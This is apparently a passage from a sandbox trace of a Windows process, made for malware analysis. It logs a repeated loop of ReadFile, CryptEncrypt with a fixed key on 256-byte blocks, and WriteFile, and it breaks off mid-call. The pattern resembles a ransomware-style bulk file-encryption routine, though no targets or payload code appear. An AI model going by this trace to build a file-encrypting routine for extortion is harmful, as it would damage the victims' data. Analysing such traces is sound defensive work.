[0171.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.508] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.508] GetLastError () returned 0x0 [0171.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.508] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.508] GetLastError () returned 0x0 [0171.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.508] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.508] GetLastError () returned 0x0 [0171.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.508] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.508] GetLastError () returned 0x0 [0171.508] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.508] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.508] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.509] GetLastError () returned 0x0 [0171.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.509] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.509] GetLastError () returned 0x0 [0171.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.509] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.509] GetLastError () returned 0x0 [0171.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.509] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.509] GetLastError () returned 0x0 [0171.509] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.509] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.510] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.510] GetLastError () returned 0x0 [0171.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.510] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.510] GetLastError () returned 0x0 [0171.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.510] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.510] GetLastError () returned 0x0 [0171.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.510] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.510] GetLastError () returned 0x0 [0171.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.510] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.510] GetLastError () returned 0x0 [0171.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.510] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.510] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.510] GetLastError () returned 0x0 [0171.510] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.511] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.511] GetLastError () returned 0x0 [0171.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.511] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.511] GetLastError () returned 0x0 [0171.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.511] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.511] GetLastError () returned 0x0 [0171.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.511] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.511] GetLastError () returned 0x0 [0171.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.511] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.511] GetLastError () returned 0x0 [0171.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.511] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.511] GetLastError () returned 0x0 [0171.511] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.511] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.512] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.512] GetLastError () returned 0x0 [0171.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.512] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.512] GetLastError () returned 0x0 [0171.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.512] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.512] GetLastError () returned 0x0 [0171.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.512] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.512] GetLastError () returned 0x0 [0171.512] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.512] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.513] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.513] GetLastError () returned 0x0 [0171.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.513] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.513] GetLastError () returned 0x0 [0171.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.513] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.513] GetLastError () returned 0x0 [0171.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.513] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.513] GetLastError () returned 0x0 [0171.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.513] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.513] GetLastError () returned 0x0 [0171.513] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.513] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.513] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.514] GetLastError () returned 0x0 [0171.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.514] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882ba0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7eb20, lpOverlapped=0x0 | out: lpBuffer=0x2882ba0*, lpNumberOfBytesRead=0x2d7eb20*=0x100, lpOverlapped=0x0) returned 1 [0171.514] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7eb08*=0x100) returned 1 [0171.514] GetLastError () returned 0x0 [0171.514] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7eb1c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7eb1c*=0x100, lpOverlapped=0x0) returned 1 [0171.514] ReadFile (in: 